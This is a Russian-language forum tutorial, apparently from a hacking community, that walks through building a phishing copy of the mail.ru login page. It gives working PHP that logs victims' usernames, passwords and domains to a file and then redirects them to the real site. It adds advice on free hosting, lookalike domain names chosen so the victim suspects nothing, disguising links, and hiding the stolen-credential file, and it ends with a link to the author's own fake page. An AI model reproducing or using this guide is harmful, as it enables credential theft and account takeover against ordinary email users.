Урок №1. Повторение - мать учения! Фейки.

Из темы хакера9009 видно, что вопросов больше всего про фейки и pinch, поэтому выкладываю более подробный мануал про создание фейков. Кому не надо прошу ничего не писать.

Поехали:
Из теории: Фейк (подделка) представляет собой ни что иное как копию нужного нам сайта (или отдельных его частей), и работает эта копия на нас, тобишь используется для получения логина и пароля от нужного нам аккаунта.

И так приступим:
Первое что необходимо сделать, это определиться фейк какого сайта мы хотим сделать. В нашем примере мы буде делать фейк mail.ru для этого необходимо перейти на этот сайт и с помощью браузера сохранить всю страничку полностью в отдельную папку, допустим mail_фейк.
Примечание: Сохраняйте страничку под именем index.html (учтите, что двойных расширений быть не должно <s>index.php.html</s>)

После проделанных манипуляций открываем сохранённую страничку в блокноте (правой кнопкой мыши -> открыть с помощью -> блокнот) и ищем строку <form name="Auth" method="post" action="http://win.mail.ru/cgi-bin/auth"> (можно воспользоваться поиском, Ctrl + F) заменяем значение action на log.php должно получится следующее  <form name="Auth" method="post" action="log.php">
Примечание: Это делается для того, чтобы запрос отсылался не на сервер маил.ру а на наш файлик log.php. В других сайтах эта строка будет выглядеть похожим образом.

После этого спускаемся чуть ниже и ищем строчку <td class="login"><input type="text" class="long" size="10" name="Login" tabindex="1" value="" /> и заменяем значение name на login (регистр важен! пишите с маленькой буквы!) должно получится так <td class="login"><input type="text" class="long" size="10" name="login" tabindex="1" value="" />

Спускаемся ещё чуть ниже и ищем строку <input type="password" class="long" size="15" name="Password" tabindex="3"> и меняем значение name на pass (тоже с маленькой буквы) получится так: <input type="password" class="long" size="15" name="pass" tabindex="3">

***
Параметр name будет всецело зависеть от того как он будет прописан в файле log.php (см. ниже)
Если, допустим, в этом файле будет значение $Login=$_Post['blabla'], то и в параметре name будет blabla (name="blabla")
***
Но в данном примере одного логина и пароля недостаточно, так как нам нужно узнать ещё и домен в котором зарегился нужный нам человек (bk.ru mail.ru inbox.ru и т.д.). Поэтому ищем строку <td class="domain"><select size="1" name="Domain" class="long" tabindex="2"> и меняем значение name на dm )) получится такое <td class="domain"><select size="1" name="dm" class="long" tabindex="2">

Вот и всё! самое сложное позади . Теперь создаем файл txt в нашей папке mail_фейк и копипастим туда это:
<?
$Login = $_POST['login']; // Логин
$Pass = $_POST['pass']; // Пароль
$Domen = $_POST['dm']; // Домен
$log = fopen("baza.php","a+"); //открываем файл хранилища
fwrite($log,"<br> $Login:$Pass$Domen \n"); //записываем всё что надо в него
fclose($log); //закрываем хранилище
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://mail.ru'></head></html>"; //перенаправляем на исходную страницу маил.ру
?>
Сохраняем его с именем log.php (расширение смените обязательно с txt на php). Создаем в этой же папке файлик baza.php (с маленькой буквы)

Теперь всё можно уверенно сказать что наш фейк готов к своим делишкам! Осталось залить его на любой бесплатный хостинг с поддержкой php (вот несколько: hut.ru, freehostia.com, 1gb.ru).
Закидываем все наши файы в корневую директорию только что зарегистрированного нами сайта .....переносим туда все наши файлы....
1)index.html
2)полностью папку(с изображениями которая была создана вместе с index.html иначе у нас не будет никаких картинок и логотипов.)
3)baza.php (здесь и будут храниться логины и пароли людей, которые "клюнули" на фейк)
4)log.php
Если необходимо написать как залить файлы на ваш хостинг по ftp сообщите допишу. Но я думаю с этим проблем не должно возникнуть.

От автора: имя сайта лучше всего подобрать похожее на Mail.ru, чтобы ваша жертва ничего не заподозрила (например mall.ru , mali.ru и т.д.). Так же чтобы скрыть непонятную ссылку от жертвы на форумах и сайтах можно воспользоваться тегами [link][/link]
Так же, чтобы другие пользователи не могли просмотреть файл baza.php с логинами и паролями можно дописать в него строку <?php die('<H1>База данных закрыта</H1>') ; ?> и после этого вам надо будет смотреть его содержимое через ftp.
Мой фейк: http://vcantakte.freehostia.com